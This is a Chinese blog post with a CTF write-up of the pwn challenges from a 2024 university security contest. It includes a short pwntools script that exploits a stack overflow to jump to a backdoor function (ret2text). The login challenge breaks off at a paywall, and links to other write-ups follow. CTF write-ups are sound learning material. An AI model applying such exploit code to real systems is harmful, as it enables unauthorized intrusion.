2024 高校网络安全管理运维赛 -实践能力赛项Writeup(pwn部分解析)

已于 2024-05-09 16:00:48 修改
阅读量588 收藏 5
点赞数 9
分类专栏: 安全 文章标签: web安全 安全
于 2024-05-09 14:42:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39435784/article/details/138613533
版权
这篇博客主要解析了2024高校网络安全管理运维赛中的两个pwn题目——babypwn和login。babypwn是一个简单的ret2text挑战,通过栈溢出和填充返回地址到后门函数实现。login题目中,通过端口扫描发现一个奇怪的开放端口,存在弱口令和缓冲区溢出漏洞,通过溢出触发panic函数获取ELF文件进行逆向分析,最终实现利用。
摘要由CSDN通过智能技术生成

1、babypwn

一个很baby的pwn

你可以 下载题目附件

 你可以 打开网页终端 或者通过命令 nc prob07.contest.pku.edu.cn 10007 连接到题目

提交 Flag:

解析:

入门的ret2text,在login中输入密码部分存在栈溢出,同时程序中存在后门函数,填充返回地址为后门函数地址

from pwn import *
p = process('./main')
# p = remote('localhost', 9999)
p.sendafter(b'Enter your username: ', b'root')
payload = b'a'*0x30 + p64(0) + p64(0x401177)
p.sendafter(b'Enter the password: ', payload)
p.interactive()

2、login

在端口扫描结果中,你发现了一个奇怪的开放

最低0.47元/天 解锁文章
靠谱哥哥
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
高校战疫网络安全分享pwn复盘
doudoudedi
03-10 863
就做了一个pwn我tcl 但是收获很多 woodenbox2 这道题有先是用chunk overlop然后将unsortbin切割到fastbin(此时unsortbin与fastbin指向了同一个堆块)通过堆溢出将低位覆盖为stdout上面的位置然后写IO_FILE结构体leaklibc基址然后通过fastbin attack打malloc_hook即可 IO_FILE结构体的知识可看一下 h...
强网杯2021 pwn 解析——babypwn
CoLin的pwn小屋
07-26 866
强网杯2021 pwn 题回顾——babypwn
baby_pwn-ret2_dl_runtime_resolve之ELF32_rel,Elf32_sym,伪造
playmaker的博客
05-07 757
0x01 ELF文件的动态链接之延迟绑定 在动态链接下,程序模块之间包含了大量的函数引用,动态链接会耗费不少时间用于解决模块之间的函数引用的符号查找以及重定位,且一部分函数在执行结束都不会用到,如果一开始链接好实际上是一种浪费,于是ELF采取的这种技术。 0x02 延迟绑定的实现过程 ...
baby_pwn ciscn 2019 第十二届全国大学生信息安全
04-22
baby_pwn 题 ciscn 2019 第十二届全国大学生信息安全
2021强网杯 pwn babypwn
yongbaoii的博客
07-15 616
libc是2.27的。 保护全开。 还开了沙箱。 经典增删改查。 add 最多17个chunk,chunk的大小最大0x200.地址跟发小都放在了bss上面。 delete 清理的很干净。 edit edit也看着没啥,里面有个函数,进去看看。 会把所有的’\x11’变成’\x00’,但是问题就出在它没有边界,仅仅是到’\x00’就停而已。那么我们就可以有越界,来造成off by null。 show 输出都点不大正常。首先发现它是前后四个字节分开的。 然后看一下那个输出函数。 加密的,好家伙。 先.
2024 高校网络安全管理运维 -实践能力赛项Writeup(algorithm部分解析
weixin_39435784的博客
05-09 359
2024 高校网络安全管理运维 -实践能力赛项Writeup(algorithm部分解析
2024 高校网络安全管理运维 -实践能力赛项Writeup(misc-2部分解析
weixin_39435784的博客
05-09 545
2024 高校网络安全管理运维 -实践能力赛项Writeup(misc-2部分解析
2024 高校网络安全管理运维 -实践能力赛项Writeup(web-2部分解析
weixin_39435784的博客
05-09 1572
2024 高校网络安全管理运维 -实践能力赛项Writeup(web-2部分解析
2024 高校网络安全管理运维 -实践能力赛项Writeup(web-1部分解析
weixin_39435784的博客
05-09 1991
2024 高校网络安全管理运维 -实践能力赛项Writeup(web-1部分解析
pwn】2020GEEKPWN复现
weixin_43960998的博客
07-05 431
      参考师傅的博客,复现一手2020GEEKPWN。 1、babypwn 思路:       1)fb 泄漏 heap_base,通过堆溢出修改 size,释放进 ub,泄漏 libc       2)然后 ub attack,这里学到 ub attack 并不一定要分配,因为漏洞发生在解链,所以只要在 ub 中发生解链即
0ctf2017-babypwn
CharlesGodX的博客
09-10 841
前言 本片文章从0ctf2017-babyheap这一道pwn题目入手,讲解pwn堆中的一些利用手法 题目链接 分析程序 首先检查程序保护,所有的保护措施都是开启的,这意味着我们想要改写程序流程考虑从malloc_hook和free_hook入手 [*] '/home/thunder/Desktop/codes/ctf/pwn/heap/0ctf_babyheap/0ctfbabyheap' ...
[V&N2020 公开]babybabypwn (SROP和orw)
carol2358的博客
05-30 1093
本题使用了SROP和orw来获得flag 第一个函数是缓冲区,第二个函数是沙盒,第三个函数是漏洞所在 沙盒把59禁了,那就是exceve不能用了 这里syscall的参数是15,那就是SigreturnFrame,那我们就用SROP SROP可以使用pwntool自带的工具 SROP的使用条件: 需要注意的是,我们在构造ROP攻击的时候,需要满足下面的条件 可以通过栈溢出来控制栈的内容 需要知道相应的地址 “/bin/sh” Signal Frame syscal sigreturn 需要有够大的
vn_pwn_babybabypwn_1(SROP+栈迁移)
seaaseesa的博客
04-09 619
vn_pwn_babybabypwn_1 首先检查一下程序的保护机制 然后,我们用IDA分析一下 显然一个signreturn的系统调用,因此可以做SROP。由于开启了PIE,因此,我们不考虑程序的bss段,而是考虑glibc的bss段,因为重新一开始告诉了我们puts函数的地址,我们就可以知道glibc的地址。我们先利用read在glibc的bss段布置下rop,然后栈迁移过去即可...
(攻防世界)(pwnpwn1(厦门邀请)babystack
PLpa的博客
07-21 2596
canary!canary!canary! 拿到题目,下载附件,查看保护。 可以很清楚的看到,程序开了canary,这就说明我们不能实现暴力的栈溢出,还要考虑这个canary的值。 我们首先运行一下程序: 可以很清楚的看出程序的功能,当我们选择1时,我们就可以输入,当我们选择2时,我们可以输出我们前面输入的东西。 进入IDA看源代码: 我们可以看到canary的值存放在v6里,v6距离rbp...
N1CTF2019——babypwn WP
qq_41252520的博客
10-13 581
保护 我的测试环境为ubuntu16.04.1 分析 添加操作中限制只能添加10个结构体: 结构体为: struct Staff{ char Name[0x10]; char *Description; int Description_Size; }; 漏洞存在删除操作中: 总的二进制程序逆向分析到这,下面来考虑怎么利用。 利用 这道题和warmup那道题有点相似,但...
2019国2.baby_pwn 利用ret2_dl_resolve
Jc
07-06 663
分析: 1.查看文件的属性 checksec 可行性文件名 2.阅读伪源码查看溢出大小 { char buf; // [sp+0h] [bp-28h]@1 return read(0, &buf, 0x100u); } 注:这里可以结合gdb-peda的 pattern命令 查看溢出大小 3.只有一个read(我们没有libc文件),strings里面没有可以利用的敏感字符...
网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 272
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-06 1110
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2021强网杯网络安全挑战Nu1L Team Writeup分析
"2021强网杯Writeup--by Nu1L Team.pdf" 是一份关于第五届“强网杯”全国网络安全挑战后分析报告,由Nu1L团队编写。报告涵盖了多个网络安全领域的挑战,包括CTF(Capture The Flag)竞网络安全和信息安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

靠谱哥哥

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值